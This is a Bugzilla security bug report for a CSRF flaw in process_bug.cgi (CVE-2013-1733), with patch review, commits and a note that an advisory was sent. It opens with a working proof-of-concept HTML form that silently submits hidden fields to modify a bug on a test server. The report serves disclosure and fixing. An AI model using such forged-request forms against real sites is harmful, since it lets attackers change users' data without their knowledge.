Closed
Bug 911593
(CVE-2013-1733)
Opened 11 years ago
Closed 11 years ago
[SECURITY] CSRF in process_bug.cgi
Categories
(Bugzilla :: Creating/Changing Bugs, defect)
Tracking
()
RESOLVED
FIXED
Bugzilla 4.4
People
(Reporter: mateusz.goik, Assigned: LpSolit)
References
()
Details
(Keywords: regression, sec-critical, wsec-csrf)
Attachments
(1 file)
2.41 KB,
patch
|
dkl
:
review+
|
Details | Diff | Splinter Review |
PoC: (Changes in the bug with ID 21951 - landfill.bugzilla.org) <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="https://landfill.bugzilla.org/bugzilla-tip/process_bug.cgi" method="POST"> <input type="hidden" name="delta_ts" value="aaaaaaaaaaaaaaaaaaaaa" /> <input type="hidden" name="longdesclength" value="1" /> <input type="hidden" name="id" value="21951" /> <input type="hidden" name="token" value="aaaaaaaaaaaaaaaaaaaaa" /> <input type="hidden" name="alias" value="aaaaaaaaa" /> <input type="hidden" name="short_desc" value="TEST2" /> <input type="hidden" name="product" value="FoodReplicator" /> <input type="hidden" name="classification" value="Unclassified" /> <input type="hidden" name="component" value="renamed component" /> <input type="hidden" name="rep_platform" value="PC" /> <input type="hidden" name="op_sys" value="Linux" /> <input type="hidden" name="priority" value="P2" /> <input type="hidden" name="bug_severity" value="normal" /> <input type="hidden" name="target_milestone" value="---" /> <input type="hidden" name="assigned_to" value="mybutt@inyourface.com" /> <input type="hidden" name="qa_contact" value="" /> <input type="hidden" name="bug_file_loc" value="" /> <input type="hidden" name="status_whiteboard" value="" /> <input type="hidden" name="keywords" value="" /> <input type="hidden" name="tag" value="" /> <input type="hidden" name="dependson" value="" /> <input type="hidden" name="blocked" value="" /> <input type="hidden" name="newcc" value="" /> <input type="hidden" name="defined_bug_ignored" value="1" /> <input type="hidden" name="see_also" value="" /> <input type="hidden" name="cf_large_text" value="" /> <input type="hidden" name="cf_free_text" value="" /> <input type="hidden" name="defined_cf_mulitple_select" value="" /> <input type="hidden" name="cf_drop_down" value="---" /> <input type="hidden" name="cf_date" value="" /> <input type="hidden" name="cf_bug_id" value="" /> <input type="hidden" name="flag_type-8" value="X" /> <input type="hidden" name="requestee_type-8" value="" /> <input type="hidden" name="flag_type-9" value="X" /> <input type="hidden" name="requestee_type-9" value="" /> <input type="hidden" name="flag_type-11" value="X" /> <input type="hidden" name="flag_type-5" value="X" /> <input type="hidden" name="requestee_type-5" value="" /> <input type="hidden" name="flag_type-10" value="X" /> <input type="hidden" name="flag_type-6" value="X" /> <input type="hidden" name="requestee_type-6" value="" /> <input type="hidden" name="flag_type-12" value="X" /> <input type="hidden" name="estimated_time" value="0.0" /> <input type="hidden" name="work_time" value="0" /> <input type="hidden" name="remaining_time" value="0.0" /> <input type="hidden" name="deadline" value="" /> <input type="hidden" name="comment" value="" /> <input type="hidden" name="bug_status" value="CONFIRMED" /> <input type="hidden" name="resolution" value="FIXED" /> <input type="hidden" name="dup_id" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Assignee | ||
Comment 1•11 years ago
|
||
Confirmed! This is a regression due to bug 69447 which generates a new valid token without first making sure that the midair collision page will be displayed. This bug only affects 4.4 and newer. 4.3.3 and older are not affected.
Assignee: general → create-and-change
Severity: normal → major
Component: Bugzilla-General → Creating/Changing Bugs
Depends on: 69447
Flags: blocking4.4.1+
Keywords: regression
OS: Linux → All
Hardware: x86_64 → All
Summary: CSRF - bugzilla → CSRF in process_bug.cgi
Target Milestone: --- → Bugzilla 4.4
Version: unspecified → 4.4
Assignee | ||
Comment 2•11 years ago
|
||
I'm on it. Easy to fix.
Assignee: create-and-change → LpSolit
Status: NEW → ASSIGNED
Assignee | ||
Comment 3•11 years ago
|
||
The new token must only be generated when we are going to display the midair collision page. Also, I had to validate delta_ts, else it was possible to crash PostgreSQL if you passed an invalid one.
Attachment #798337 -
Flags: review?(dkl)
Assignee | ||
Updated•11 years ago
|
Summary: CSRF in process_bug.cgi → [SECURITY] CSRF in process_bug.cgi
Updated•11 years ago
|
Flags: sec-bounty?
Keywords: sec-critical,
wsec-csrf
Comment 5•11 years ago
|
||
Comment on attachment 798337 [details] [diff] [review] patch, v1 Review of attachment 798337 [details] [diff] [review]: ----------------------------------------------------------------- Looks fine and fixes the issue for me. r=dkl ::: process_bug.cgi @@ +114,5 @@ > +my $delta_ts = $cgi->param('delta_ts'); > + > +if ($delta_ts) { > + my $delta_ts_z = datetime_from($delta_ts) > + or ThrowCodeError('invalid_timestamp', { timestamp => $delta_ts }); nit: 4 space indentation @@ +124,3 @@ > > + my $start_at = $cgi->param('longdesclength') > + or ThrowCodeError('undefined_field', { field => 'longdesclength' }); same nit
Attachment #798337 -
Flags: review?(dkl) → review+
Assignee | ||
Comment 6•11 years ago
|
||
(In reply to David Lawrence [:dkl] from comment #5) > nit: 4 space indentation Not when splitting long lines. ;)
Assignee | ||
Updated•11 years ago
|
Flags: approval?
Flags: approval4.4?
Comment 7•11 years ago
|
||
Will be patched on bugzilla.redhat.com at 4am UTC (just over two hours from now)
Flags: approval?
Flags: approval4.4?
Flags: approval4.4+
Flags: approval+
Comment 8•11 years ago
|
||
Dave: does this affect BMO? iirc we're on 4.2 plus backported goodies and may or may not suffer from this.
Flags: needinfo?(dkl)
Assignee | ||
Comment 9•11 years ago
|
||
(In reply to Daniel Veditz [:dveditz] from comment #8) > Dave: does this affect BMO? Yes, see bug 912661.
Flags: needinfo?(dkl)
Assignee | ||
Comment 10•11 years ago
|
||
Committing to: bzr+ssh://lpsolit%40gmail.com@bzr.mozilla.org/bugzilla/trunk/ modified process_bug.cgi Committed revision 8777. Committing to: bzr+ssh://lpsolit%40gmail.com@bzr.mozilla.org/bugzilla/4.4/ modified process_bug.cgi Committed revision 8623.
Status: ASSIGNED → RESOLVED
Closed: 11 years ago
Resolution: --- → FIXED
Updated•11 years ago
|
Group: bugzilla-security
Assignee | ||
Comment 11•11 years ago
|
||
Security advisory sent.
Updated•11 years ago
|
Flags: sec-bounty? → sec-bounty+
You need to log in
before you can comment on or make changes to this bug.
Description
•